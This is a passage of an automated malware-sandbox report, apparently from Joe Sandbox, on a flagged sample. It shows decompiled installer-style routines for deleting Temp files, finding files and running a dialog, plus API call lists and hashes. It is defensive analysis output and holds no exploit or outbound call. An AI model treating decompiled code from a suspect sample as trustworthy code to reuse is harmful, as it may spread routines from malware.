                                                  0x00405d2c
                                                  0x00405d34
                                                  0x00405d39
                                                  0x00405d40
                                                  0x00405d5b
                                                  0x00405d60
                                                  0x00405d62
                                                  0x00405d86
                                                  0x00405d64
                                                  0x00405d64
                                                  0x00405d67
                                                  0x00405d7b
                                                  0x00405d69
                                                  0x00405d6c
                                                  0x00405d74
                                                  0x00405d74
                                                  0x00405d67
                                                  0x00405d42
                                                  0x00405d48
                                                  0x00405d4a
                                                  0x00405d50
                                                  0x00405d50
                                                  0x00405d4a
                                                  0x00000000
                                                  0x00405d40
                                                  0x00405d0e
                                                  0x00405d16
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d18
                                                  0x00405d20
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d22
                                                  0x00405d2a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d8b
                                                  0x00405d93
                                                  0x00405d99
                                                  0x00405d99
                                                  0x00405da2
                                                  0x00000000
                                                  0x00405da2
                                                  0x00405ccd
                                                  0x00405cd5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405c91
                                                  0x00405c91
                                                  0x00405c93
                                                  0x00405db3
                                                  0x00405db5
                                                  0x00405db8
                                                  0x00405e09
                                                  0x00405e09
                                                  0x00405e09
                                                  0x00405dba
                                                  0x00405dbd
                                                  0x00405dc8
                                                  0x00405dcd
                                                  0x00405dcf
                                                  0x00000000
                                                  0x00000000
                                                  0x00405dd2
                                                  0x00405dde
                                                  0x00405de3
                                                  0x00405de5
                                                  0x00000000
                                                  0x00405e00
                                                  0x00405de7
                                                  0x00405dea
                                                  0x00000000
                                                  0x00000000
                                                  0x00405def
                                                  0x00000000
                                                  0x00405df6
                                                  0x00405dbf
                                                  0x00405dbf
                                                  0x00000000
                                                  0x00405dbf
                                                  0x00405c99
                                                  0x00405c9c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405c9c

                                                  APIs
                                                  • DeleteFileW.KERNELBASE(?,?,75533420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                  • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75533420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                  • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75533420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                  • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-1953461807
                                                  • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                  • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                  • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                  • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406873(WCHAR* _a4) {
                                                  				void* _t2;
                                                  
                                                  				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
                                                  				if(_t2 == 0xffffffff) {
                                                  					return 0;
                                                  				}
                                                  				FindClose(_t2);
                                                  				return 0x4302b8;
                                                  			}




                                                  0x0040687e
                                                  0x00406887
                                                  0x00000000
                                                  0x00406894
                                                  0x0040688a
                                                  0x00000000

                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 4Su,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75533420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                  • FindClose.KERNEL32(00000000), ref: 0040688A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                  • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                  • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                  • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 194 403f9a-403fac 195 403fb2-403fb8 194->195 196 404113-404122 194->196 195->196 197 403fbe-403fc7 195->197 198 404171-404186 196->198 199 404124-40416c GetDlgItem * 2 call 404499 SetClassLongW call 40140b 196->199 200 403fc9-403fd6 SetWindowPos 197->200 201 403fdc-403fe3 197->201 203 4041c6-4041cb call 4044e5 198->203 204 404188-40418b 198->204 199->198 200->201 206 403fe5-403fff ShowWindow 201->206 207 404027-40402d 201->207 212 4041d0-4041eb 203->212 209 40418d-404198 call 401389 204->209 210 4041be-4041c0 204->210 213 404100-40410e call 404500 206->213 214 404005-404018 GetWindowLongW 206->214 215 404046-404049 207->215 216 40402f-404041 DestroyWindow 207->216 209->210 229 40419a-4041b9 SendMessageW 209->229 210->203 211 404466 210->211 223 404468-40446f 211->223 220 4041f4-4041fa 212->220 221 4041ed-4041ef call 40140b 212->221 213->223 214->213 222 40401e-404021 ShowWindow 214->222 226 40404b-404057 SetWindowLongW 215->226 227 40405c-404062 215->227 224 404443-404449 216->224 233 404200-40420b 220->233 234 404424-40443d DestroyWindow EndDialog 220->234 221->220 222->207 224->211 232 40444b-404451 224->232 226->223 227->213 235 404068-404077 GetDlgItem 227->235 229->223 232->211 236 404453-40445c ShowWindow 232->236 233->234 237 404211-40425e call 40657a call 404499 * 3 GetDlgItem 233->237 234->224 238 404096-404099 235->238 239 404079-404090 SendMessageW IsWindowEnabled 235->239 236->211 266 404260-404265 237->266 267 404268-4042a4 ShowWindow KiUserCallbackDispatcher call 4044bb EnableWindow 237->267 240 40409b-40409c 238->240 241 40409e-4040a1 238->241 239->211 239->238 243 4040cc-4040d1 call 404472 240->243 244 4040a3-4040a9 241->244 245 4040af-4040b4 241->245 243->213 247 4040ea-4040fa SendMessageW 244->247 248 4040ab-4040ad 244->248 245->247 249 4040b6-4040bc 245->249 247->213 248->243 252 4040d3-4040dc call 40140b 249->252 253 4040be-4040c4 call 40140b 249->253 252->213 262 4040de-4040e8 252->262 264 4040ca 253->264 262->264 264->243 266->267 270 4042a6-4042a7 267->270 271 4042a9 267->271 272 4042ab-4042d9 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042db-4042ec SendMessageW 272->273 274 4042ee 272->274 275 4042f4-404333 call 4044ce call 403f7b call 40653d lstrlenW call 40657a SetWindowTextW call 401389 273->275 274->275 275->212 286 404339-40433b 275->286 286->212 287 404341-404345 286->287 288 404364-404378 DestroyWindow 287->288 289 404347-40434d 287->289 288->224 291 40437e-4043ab CreateDialogParamW 288->291 289->211 290 404353-404359 289->290 290->212 292 40435f 290->292 291->224 293 4043b1-404408 call 404499 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->211 293->211 298 40440a-40441d ShowWindow call 4044e5 293->298 300 404422 298->300 300->224
                                                  C-Code - Quality: 84%
                                                  			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                  				struct HWND__* _v28;
                                                  				void* _v84;
                                                  				void* _v88;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t34;
                                                  				signed int _t36;
                                                  				signed int _t38;
                                                  				struct HWND__* _t48;
                                                  				signed int _t67;
                                                  				struct HWND__* _t73;
                                                  				signed int _t86;
                                                  				struct HWND__* _t91;
                                                  				signed int _t99;
                                                  				int _t103;
                                                  				signed int _t117;
                                                  				int _t118;
                                                  				int _t122;
                                                  				signed int _t124;
                                                  				struct HWND__* _t127;
                                                  				struct HWND__* _t128;
                                                  				int _t129;
                                                  				intOrPtr _t130;
                                                  				long _t133;
                                                  				int _t135;
                                                  				int _t136;
                                                  				void* _t137;
                                                  				void* _t146;
                                                  
                                                  				_t130 = _a8;
                                                  				if(_t130 == 0x110 || _t130 == 0x408) {
                                                  					_t34 = _a12;
                                                  					_t127 = _a4;
                                                  					__eflags = _t130 - 0x110;
                                                  					 *0x42d250 = _t34;
                                                  					if(_t130 == 0x110) {
                                                  						 *0x434f08 = _t127;
                                                  						 *0x42d264 = GetDlgItem(_t127, 1);
                                                  						_t91 = GetDlgItem(_t127, 2);
                                                  						_push(0xffffffff);
                                                  						_push(0x1c);
                                                  						 *0x42b230 = _t91;
                                                  						E00404499(_t127);
                                                  						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
                                                  						 *0x433ecc = E0040140B(4);
                                                  						_t34 = 1;
                                                  						__eflags = 1;
                                                  						 *0x42d250 = 1;
                                                  					}
                                                  					_t124 =  *0x40a368; // 0x0
                                                  					_t136 = 0;
                                                  					_t133 = (_t124 << 6) +  *0x434f20;
                                                  					__eflags = _t124;
                                                  					if(_t124 < 0) {
                                                  						L36:
                                                  						E004044E5(0x40b);
                                                  						while(1) {
                                                  							_t36 =  *0x42d250;
                                                  							 *0x40a368 =  *0x40a368 + _t36;
                                                  							_t133 = _t133 + (_t36 << 6);
                                                  							_t38 =  *0x40a368; // 0x0
                                                  							__eflags = _t38 -  *0x434f24;
                                                  							if(_t38 ==  *0x434f24) {
                                                  								E0040140B(1);
                                                  							}
                                                  							__eflags =  *0x433ecc - _t136; // 0x0
                                                  							if(__eflags != 0) {
                                                  								break;
                                                  							}
                                                  							__eflags =  *0x40a368 -  *0x434f24; // 0x0
                                                  							if(__eflags >= 0) {
                                                  								break;
                                                  							}
                                                  							_t117 =  *(_t133 + 0x14);
                                                  							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                                                  							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                  							_push(0xfffffc19);
                                                  							E00404499(_t127);
                                                  							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                  							_push(0xfffffc1b);
                                                  							E00404499(_t127);
                                                  							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                  							_push(0xfffffc1a);
                                                  							E00404499(_t127);
                                                  							_t48 = GetDlgItem(_t127, 3);
                                                  							__eflags =  *0x434f8c - _t136;
                                                  							_v28 = _t48;
                                                  							if( *0x434f8c != _t136) {
                                                  								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                  								__eflags = _t117;
                                                  							}
                                                  							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                                  							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                                  							E004044BB(_t117 & 0x00000002);
                                                  							_t118 = _t117 & 0x00000004;
                                                  							EnableWindow( *0x42b230, _t118);
                                                  							__eflags = _t118 - _t136;
                                                  							if(_t118 == _t136) {
                                                  								_push(1);
                                                  							} else {
                                                  								_push(_t136);
                                                  							}
                                                  							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                  							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                  							__eflags =  *0x434f8c - _t136;
                                                  							if( *0x434f8c == _t136) {
                                                  								_push( *0x42d264);
                                                  							} else {
                                                  								SendMessageW(_t127, 0x401, 2, _t136);
                                                  								_push( *0x42b230);
                                                  							}
                                                  							E004044CE();
                                                  							E0040653D(0x42d268, E00403F7B());
                                                  							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                  							SetWindowTextW(_t127, 0x42d268); // executed
                                                  							_push(_t136);
                                                  							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                  							__eflags = _t67;
                                                  							if(_t67 != 0) {
                                                  								continue;
                                                  							} else {
                                                  								__eflags =  *_t133 - _t136;
                                                  								if( *_t133 == _t136) {
                                                  									continue;
                                                  								}
                                                  								__eflags =  *(_t133 + 4) - 5;
                                                  								if( *(_t133 + 4) != 5) {
                                                  									DestroyWindow( *0x433ed8); // executed
                                                  									 *0x42c240 = _t133;
                                                  									__eflags =  *_t133 - _t136;
                                                  									if( *_t133 <= _t136) {
                                                  										goto L60;
                                                  									}
                                                  									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
                                                  									__eflags = _t73 - _t136;
                                                  									 *0x433ed8 = _t73;
                                                  									if(_t73 == _t136) {
                                                  										goto L60;
                                                  									}
                                                  									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                  									_push(6);
                                                  									E00404499(_t73);
                                                  									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                  									ScreenToClient(_t127, _t137 + 0x10);
                                                  									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                  									_push(_t136);
                                                  									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                  									__eflags =  *0x433ecc - _t136; // 0x0
                                                  									if(__eflags != 0) {
                                                  										goto L63;
                                                  									}
                                                  									ShowWindow( *0x433ed8, 8); // executed
                                                  									E004044E5(0x405);
                                                  									goto L60;
                                                  								}
                                                  								__eflags =  *0x434f8c - _t136;
                                                  								if( *0x434f8c != _t136) {
                                                  									goto L63;
                                                  								}
                                                  								__eflags =  *0x434f80 - _t136;
                                                  								if( *0x434f80 != _t136) {
                                                  									continue;
                                                  								}
                                                  								goto L63;
                                                  							}
                                                  						}
                                                  						DestroyWindow( *0x433ed8);
                                                  						 *0x434f08 = _t136;
                                                  						EndDialog(_t127,  *0x42ba38);
                                                  						goto L60;
                                                  					} else {
                                                  						__eflags = _t34 - 1;
                                                  						if(_t34 != 1) {
                                                  							L35:
                                                  							__eflags =  *_t133 - _t136;
                                                  							if( *_t133 == _t136) {
                                                  								goto L63;
                                                  							}
                                                  							goto L36;
                                                  						}
                                                  						_push(0);
                                                  						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                  						__eflags = _t86;
                                                  						if(_t86 == 0) {
                                                  							goto L35;
                                                  						}
                                                  						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                                                  						__eflags =  *0x433ecc - _t136; // 0x0
                                                  						return 0 | __eflags == 0x00000000;
                                                  					}
                                                  				} else {
                                                  					_t127 = _a4;
                                                  					_t136 = 0;
                                                  					if(_t130 == 0x47) {
                                                  						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
                                                  					}
                                                  					_t122 = _a12;
                                                  					if(_t130 != 5) {
                                                  						L8:
                                                  						if(_t130 != 0x40d) {
                                                  							__eflags = _t130 - 0x11;
                                                  							if(_t130 != 0x11) {
                                                  								__eflags = _t130 - 0x111;
                                                  								if(_t130 != 0x111) {
                                                  									L28:
                                                  									return E00404500(_a8, _t122, _a16);
                                                  								}
                                                  								_t135 = _t122 & 0x0000ffff;
                                                  								_t128 = GetDlgItem(_t127, _t135);
                                                  								__eflags = _t128 - _t136;
                                                  								if(_t128 == _t136) {
                                                  									L15:
                                                  									__eflags = _t135 - 1;
                                                  									if(_t135 != 1) {
                                                  										__eflags = _t135 - 3;
                                                  										if(_t135 != 3) {
                                                  											_t129 = 2;
                                                  											__eflags = _t135 - _t129;
                                                  											if(_t135 != _t129) {
                                                  												L27:
                                                  												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
                                                  												goto L28;
                                                  											}
                                                  											__eflags =  *0x434f8c - _t136;
                                                  											if( *0x434f8c == _t136) {
                                                  												_t99 = E0040140B(3);
                                                  												__eflags = _t99;
                                                  												if(_t99 != 0) {
                                                  													goto L28;
                                                  												}
                                                  												 *0x42ba38 = 1;
                                                  												L23:
                                                  												_push(0x78);
                                                  												L24:
                                                  												E00404472();
                                                  												goto L28;
                                                  											}
                                                  											E0040140B(_t129);
                                                  											 *0x42ba38 = _t129;
                                                  											goto L23;
                                                  										}
                                                  										__eflags =  *0x40a368 - _t136; // 0x0
                                                  										if(__eflags <= 0) {
                                                  											goto L27;
                                                  										}
                                                  										_push(0xffffffff);
                                                  										goto L24;
                                                  									}
                                                  									_push(_t135);
                                                  									goto L24;
                                                  								}
                                                  								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                  								_t103 = IsWindowEnabled(_t128);
                                                  								__eflags = _t103;
                                                  								if(_t103 == 0) {
                                                  									L63:
                                                  									return 0;
                                                  								}
                                                  								goto L15;
                                                  							}
                                                  							SetWindowLongW(_t127, _t136, _t136);
                                                  							return 1;
                                                  						}
                                                  						DestroyWindow( *0x433ed8);
                                                  						 *0x433ed8 = _t122;
                                                  						L60:
                                                  						if( *0x42f268 == _t136) {
                                                  							_t146 =  *0x433ed8 - _t136; // 0x1501a8
                                                  							if(_t146 != 0) {
                                                  								ShowWindow(_t127, 0xa); // executed
                                                  								 *0x42f268 = 1;
                                                  							}
                                                  						}
                                                  						goto L63;
                                                  					}
                                                  					asm("sbb eax, eax");
                                                  					ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
                                                  					if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                  						goto L28;
                                                  					} else {
                                                  						ShowWindow(_t127, 4);
                                                  						goto L8;
                                                  					}
                                                  				}
                                                  			}
































                                                  0x00403fa5
                                                  0x00403fac
                                                  0x00404113
                                                  0x00404117
                                                  0x0040411b
                                                  0x0040411d
                                                  0x00404122
                                                  0x0040412d
                                                  0x00404138
                                                  0x0040413d
                                                  0x0040413f
                                                  0x00404141
                                                  0x00404144
                                                  0x00404149
                                                  0x00404157
                                                  0x00404164
                                                  0x0040416b
                                                  0x0040416b
                                                  0x0040416c
                                                  0x0040416c
                                                  0x00404171
                                                  0x00404177
                                                  0x0040417e
                                                  0x00404184
                                                  0x00404186
                                                  0x004041c6
                                                  0x004041cb
                                                  0x004041d0
                                                  0x004041d0
                                                  0x004041d5
                                                  0x004041de
                                                  0x004041e0
                                                  0x004041e5
                                                  0x004041eb
                                                  0x004041ef
                                                  0x004041ef
                                                  0x004041f4
                                                  0x004041fa
                                                  0x00000000
                                                  0x00000000
                                                  0x00404205
                                                  0x0040420b
                                                  0x00000000
                                                  0x00000000
                                                  0x00404214
                                                  0x0040421c
                                                  0x00404221
                                                  0x00404224
                                                  0x0040422a
                                                  0x0040422f
                                                  0x00404232
                                                  0x00404238
                                                  0x0040423d
                                                  0x00404240
                                                  0x00404246
                                                  0x0040424e
                                                  0x00404254
                                                  0x0040425a
                                                  0x0040425e
                                                  0x00404265
                                                  0x00404265
                                                  0x00404265
                                                  0x0040426f
                                                  0x00404281
                                                  0x0040428d
                                                  0x00404292
                                                  0x0040429c
                                                  0x004042a2
                                                  0x004042a4
                                                  0x004042a9
                                                  0x004042a6
                                                  0x004042a6
                                                  0x004042a6
                                                  0x004042b9
                                                  0x004042d1
                                                  0x004042d3
                                                  0x004042d9
                                                  0x004042ee
                                                  0x004042db
                                                  0x004042e4
                                                  0x004042e6
                                                  0x004042e6
                                                  0x004042f4
                                                  0x00404305
                                                  0x0040431b
                                                  0x00404322
                                                  0x00404328
                                                  0x0040432c
                                                  0x00404331
                                                  0x00404333
                                                  0x00000000
                                                  0x00404339
                                                  0x00404339
                                                  0x0040433b
                                                  0x00000000
                                                  0x00000000
                                                  0x00404341
                                                  0x00404345
                                                  0x0040436a
                                                  0x00404370
                                                  0x00404376
                                                  0x00404378
                                                  0x00000000
                                                  0x00000000
                                                  0x0040439e
                                                  0x004043a4
                                                  0x004043a6
                                                  0x004043ab
                                                  0x00000000
                                                  0x00000000
                                                  0x004043b1
                                                  0x004043b4
                                                  0x004043b7
                                                  0x004043ce
                                                  0x004043da
                                                  0x004043f3
                                                  0x004043f9
                                                  0x004043fd
                                                  0x00404402
                                                  0x00404408
                                                  0x00000000
                                                  0x00000000
                                                  0x00404412
                                                  0x0040441d
                                                  0x00000000
                                                  0x0040441d
                                                  0x00404347
                                                  0x0040434d
                                                  0x00000000
                                                  0x00000000
                                                  0x00404353
                                                  0x00404359
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040435f
                                                  0x00404333
                                                  0x0040442a
                                                  0x00404436
                                                  0x0040443d
                                                  0x00000000
                                                  0x00404188
                                                  0x00404188
                                                  0x0040418b
                                                  0x004041be
                                                  0x004041be
                                                  0x004041c0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004041c0
                                                  0x0040418d
                                                  0x00404191
                                                  0x00404196
                                                  0x00404198
                                                  0x00000000
                                                  0x00000000
                                                  0x004041a8
                                                  0x004041b0
                                                  0x00000000
                                                  0x004041b6
                                                  0x00403fbe
                                                  0x00403fbe
                                                  0x00403fc2
                                                  0x00403fc7
                                                  0x00403fd6
                                                  0x00403fd6
                                                  0x00403fdc
                                                  0x00403fe3
                                                  0x00404027
                                                  0x0040402d
                                                  0x00404046
                                                  0x00404049
                                                  0x0040405c
                                                  0x00404062
                                                  0x00404100
                                                  0x00000000
                                                  0x00404109
                                                  0x00404068
                                                  0x00404073
                                                  0x00404075
                                                  0x00404077
                                                  0x00404096
                                                  0x00404096
                                                  0x00404099
                                                  0x0040409e
                                                  0x004040a1
                                                  0x004040b1
                                                  0x004040b2
                                                  0x004040b4
                                                  0x004040ea
                                                  0x004040fa
                                                  0x00000000
                                                  0x004040fa
                                                  0x004040b6
                                                  0x004040bc
                                                  0x004040d5
                                                  0x004040da
                                                  0x004040dc
                                                  0x00000000
                                                  0x00000000
                                                  0x004040de
                                                  0x004040ca
                                                  0x004040ca
                                                  0x004040cc
                                                  0x004040cc
                                                  0x00000000
                                                  0x004040cc
                                                  0x004040bf
                                                  0x004040c4
                                                  0x00000000
                                                  0x004040c4
                                                  0x004040a3
                                                  0x004040a9
                                                  0x00000000
                                                  0x00000000
                                                  0x004040ab
                                                  0x00000000
                                                  0x004040ab
                                                  0x0040409b
                                                  0x00000000
                                                  0x0040409b
                                                  0x00404081
                                                  0x00404088
                                                  0x0040408e
                                                  0x00404090
                                                  0x00404466
                                                  0x00000000
                                                  0x00404466
                                                  0x00000000
                                                  0x00404090
                                                  0x0040404e
                                                  0x00000000
                                                  0x00404056
                                                  0x00404035
                                                  0x0040403b
                                                  0x00404443
                                                  0x00404449
                                                  0x0040444b
                                                  0x00404451
                                                  0x00404456
                                                  0x0040445c
                                                  0x0040445c
                                                  0x00404451
                                                  0x00000000
                                                  0x00404449
                                                  0x00403fea
                                                  0x00403ff6
                                                  0x00403fff
                                                  0x00000000
                                                  0x0040401e
                                                  0x00404021
                                                  0x00000000
                                                  0x00404021
                                                  0x00403fff

                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                  • ShowWindow.USER32(?), ref: 00403FF6
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                  • ShowWindow.USER32(?,00000004), ref: 00404021
                                                  • DestroyWindow.USER32 ref: 00404035
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                  • GetDlgItem.USER32(?,?), ref: 0040406D
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                  • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                  • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                  • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                  • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                  • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                  • EnableWindow.USER32(?,?), ref: 0040429C
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                  • EnableMenuItem.USER32(00000000), ref: 004042B9
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                  • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                  • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                  • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID:
                                                  • API String ID: 121052019-0
                                                  • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                  • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                  • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                  • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
